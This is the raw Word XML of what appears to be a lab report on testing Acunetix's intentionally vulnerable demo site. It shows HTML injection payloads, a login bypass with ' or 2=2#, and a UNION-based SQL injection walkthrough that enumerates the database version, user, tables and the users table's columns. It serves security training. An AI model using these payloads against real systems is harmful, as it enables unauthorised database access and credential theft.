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03338" w14:textId="25BBFF2B" w:rsidR="00B31D43" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43" w:rsidP="00111B6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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96675F" w14:textId="77777777" w:rsidR="00B31D43" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DBB3ED" w14:textId="77977F46" w:rsidR="00982879" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43" w:rsidP="00111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DB1B97"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Injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09895320" w14:textId="32192904" w:rsidR="00DB1B97" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00DB1B97" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Html injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B88CDA" w14:textId="67E8699A" w:rsidR="00DB1B97" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43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38EBDE7" wp14:editId="6A41B2E3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943600" cy="55860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B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">we used html tag inside search box </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“ &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>h1&gt; RAAX &lt;/h1&gt; “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EE9C8" w14:textId="778A5788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114CFD10" w14:textId="6662AA79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7232CA3B" w14:textId="21853751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51E9FD7F" w14:textId="18AEDD56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51B5748A" w14:textId="22BF453E" w:rsidR="00B31D43" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 HTML INJECTION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DEAD0" w14:textId="5A2828E3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url: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/guestbook.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F34FB6B" w14:textId="28512D31" w:rsidR="00DB1B97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70F9AF6" wp14:editId="0CB8C575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51663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31D43" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>code :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B31D43" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;h2&gt;Raax Here &lt;h2&gt; &lt;br&gt; &lt;h1&gt;hello&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41442A" w14:textId="3EE0B834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4E077E87" w14:textId="0AF6772B" w:rsidR="00DB1B97" w:rsidRPr="00111B61" w:rsidRDefault="00DB1B97" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4667E4" w14:textId="240C634E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0A4A7A23" w14:textId="663C392D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2F6A507C" w14:textId="1C9E766C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0631CAC1" w14:textId="3F3C0676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7CD0A71E" w14:textId="6BA82A53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2D6C98E1" w14:textId="3A31CAC7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2862CEBD" w14:textId="13FAD839" w:rsidR="005867D1" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43" w:rsidP="00111B6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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="005867D1" w:rsidRPr="00111B6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111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>QL I</w:t>
      </w:r>
      <w:r w:rsidR="005867D1" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>njection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2FAB1" w14:textId="2528FEF5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url: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06A83E71" w14:textId="2E9F07CC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55E92BF" wp14:editId="4DB37FEF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36494" cy="5227773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31D43" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>query :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B31D43" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ or 2=2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B5E24C" w14:textId="0394E433" w:rsidR="005867D1" w:rsidRPr="00111B61" w:rsidRDefault="005867D1" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A787185" w14:textId="5F33FF75" w:rsidR="005867D1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2533E6" wp14:editId="7CB8F8F6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943600" cy="53600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22B6" w14:textId="5B08E5CD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7F64DC2F" w14:textId="5B5FFACC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0C254A8A" w14:textId="3CE3EE48" w:rsidR="00FD41C0" w:rsidRPr="00111B61" w:rsidRDefault="00B31D43" w:rsidP="00111B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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">we got logged in as </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61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111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015FD13" w14:textId="7C7F08BC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307F0477" w14:textId="13DB1FED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586480A4" w14:textId="22A8009A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222BD270" w14:textId="0634D8E6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3471AA99" w14:textId="0F390ACA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352A3D1D" w14:textId="30774F3D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3A479327" w14:textId="60E395C8" w:rsidR="008A298C" w:rsidRPr="00111B61" w:rsidRDefault="008A298C" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1.4 SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379825CE" w14:textId="3F083D9A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url: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CFF7B40" w14:textId="1ECD6FB1" w:rsidR="00C37BC5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  <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>query :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> test’#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A89EED" w14:textId="48990426" w:rsidR="00FD41C0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8783C58" wp14:editId="3140FA1A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943600" cy="37611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DA590" w14:textId="2BA1111E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5D1A7481" w14:textId="5AF45313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6A23F46A" w14:textId="006471A9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28690A22" w14:textId="60B6747F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52A01290" w14:textId="61F503C3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0F9E4DCC" w14:textId="471B4B8C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7D2E1BCA" w14:textId="6CECFDBB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5ACED7C2" w14:textId="4C380BD0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1D29F857" w14:textId="6E28E9E9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32A27459" w14:textId="1D5658F8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149FE562" w14:textId="552F986C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1DF74D70" w14:textId="65FF1D72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7197F86" wp14:editId="3F4C80CE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943600" cy="457073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0EBC0" w14:textId="77777777" w:rsidR="00C37BC5" w:rsidRPr="00111B61" w:rsidRDefault="00C37BC5" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712D9048" w14:textId="7C050C45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68B4A57B" w14:textId="753D479B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4AF1030A" w14:textId="1B0E68AF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12D2B115" w14:textId="37E02C40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43202971" w14:textId="4BE70FEB" w:rsidR="008938E2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With this query we got successfully logged in as </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E2DEA" w14:textId="31200350" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00FE7E49" w:rsidP="00111B6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1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1.5 SQL execution in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342BDC25" w14:textId="23697C6B" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00FE7E49" w:rsidP="00111B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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“ ‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “ to check if url is vulnerable to injection or not , as result it is vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A99437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0D2CCCE7" wp14:editId="0ABD7E08">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>422275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5394960" cy="582168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B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">url: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7ED21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2A40DB17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1521BB81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A22F58A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3A329962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2330DCF" w14:textId="525755CB" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00831CB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We used ORDER BY clause to check number of columns we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>have ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> till 11 we got results </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA5836F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url: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18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http://testphp.vulnweb.com/listproducts.php?cat=1%20ORDER%20BY%201,2,3,4,5,6,7,8,9,10,11</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57B00CDE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2298B0A8" wp14:editId="56BDD5E7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64331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8ECC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1C74DC0A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A2A1A6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C432EFE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86E96BF" w14:textId="434A286D" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00831CB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After entering value 12 page through </w:t>
      </w:r>
      <w:r w:rsidR="00111606" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>error,</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with this we get to know we total 11 number of columns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5599FA5F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4BC3D396" wp14:editId="32990513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943600" cy="5936615"/>
            <wp:effectExtent l="0" t="0" r="0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http://testphp.vulnweb.com/listproducts.php?cat=1%20ORDER%20BY%201,2,3,4,5,6,7,8,9,10,11,12</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F26F850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52A767C5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7B44D365" w14:textId="5400B617" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00831CB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t xml:space="preserve">After getting confirmation number of </w:t>
      </w:r>
      <w:r w:rsidR="005D5E8D" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>columns,</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> we are checking how many of them are </w:t>
      </w:r>
      <w:r w:rsidR="005D5E8D" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>injectable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52694E68" w14:textId="42836151" w:rsidR="00831CB8" w:rsidRPr="00111B61" w:rsidRDefault="00831CB8" w:rsidP="00111B61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111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="001F5C99" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D5E8D" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>used UNION SELECT Query to perform this operation</w:t>
      </w:r>
      <w:r w:rsidR="00646FA8" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6EC85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hyperlink r:id="rId22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http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2707CABB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33646CBD" wp14:editId="2EAC6966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592836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932B6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231B5499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6A893B62" w14:textId="29B869E9" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00646FA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>column number 2,7,9 is injectable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D5549" w14:textId="77777777" w:rsidR="00646FA8" w:rsidRPr="00111B61" w:rsidRDefault="00646FA8" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26010952" w14:textId="4F5555A9" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00646FA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As column number 2,7,9 is injectable we will use SQl query to get Version of database, Database name, Local user present in Database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CF4CE8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hyperlink r:id="rId24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http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,version(),3,4,5,6,database(),8,system_user(),10,11</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BC62A02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2754469F" wp14:editId="6726100F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5973445"/>
            <wp:effectExtent l="0" t="0" r="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684BC" w14:textId="17C408D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5693EEC7" w14:textId="4B3A057B" w:rsidR="00646FA8" w:rsidRPr="00111B61" w:rsidRDefault="00646FA8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t xml:space="preserve">we got </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database name</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: acuart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43582076" w14:textId="1D511129" w:rsidR="00646FA8" w:rsidRPr="00111B61" w:rsidRDefault="006540B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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00646FA8" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atabase Version</w:t>
      </w:r>
      <w:r w:rsidR="00646FA8" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: 8.0.22-0ubuntu0.20.04.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482CC3C0" w14:textId="0EFDB1BF" w:rsidR="00646FA8" w:rsidRDefault="006540B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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00646FA8" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ocal user</w:t>
      </w:r>
      <w:r w:rsidR="00646FA8" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: acurat@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35989F30" w14:textId="3B1FD41F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4F198160" w14:textId="20853118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0B92ACE" w14:textId="4AABE672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FB47370" w14:textId="08BD693B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657AB23B" w14:textId="2F146B4F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D65826D" w14:textId="7A49696F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6D5EBF5B" w14:textId="66E005F6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B518A9B" w14:textId="423F26CA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0BBFDBFE" w14:textId="5A67531F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48ECC0C6" w14:textId="3DAC5714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17956A5E" w14:textId="5A1E524B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5847DF49" w14:textId="584DDDC4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E4197C6" w14:textId="75684C29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D3EBACE" w14:textId="2A9138B2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2038BF8F" w14:textId="3C19A1F3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E66A851" w14:textId="0353F862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476C699E" w14:textId="251CBE13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5AB4AA0E" w14:textId="5FECBC0B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17F6CD7C" w14:textId="7235DF91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17CEAF7F" w14:textId="6F2F4B50" w:rsidR="00111606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04693467" w14:textId="77777777" w:rsidR="00111606" w:rsidRPr="00111B61" w:rsidRDefault="00111606" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321A8280" w14:textId="664CCC2F" w:rsidR="003B071C" w:rsidRPr="00111B61" w:rsidRDefault="003B071C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t>As now we have Database name, we will try to get tables name inside database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6302ABA2" w14:textId="2B4201AA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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A430889" wp14:editId="38AB37A0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>53340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>640715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5524979" cy="7300593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7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http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=%27acuart%27</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="787F62C1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49FC7E7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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B81D662" wp14:editId="5F0A3E9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220152" cy="6363251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BD0D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6CD720B1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140E11D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7F0FCD0A" w14:textId="5D73C10D" w:rsidR="003B071C" w:rsidRPr="00111B61" w:rsidRDefault="003B071C" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720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We got 8 tables name. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E9831E" w14:textId="145C435C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5104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27105AFC" wp14:editId="397F4280">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-104775</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>548640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5471634" cy="7392041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17A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="003B071C" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">e got 8 tables </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B071C" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>name ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B071C" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> we are interested in </w:t>
      </w:r>
      <w:r w:rsidR="003B071C" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="003B071C" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>table and its columns.</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,column_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=%27users%27</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1457DF8E" w14:textId="77777777" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="00FE7E49" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
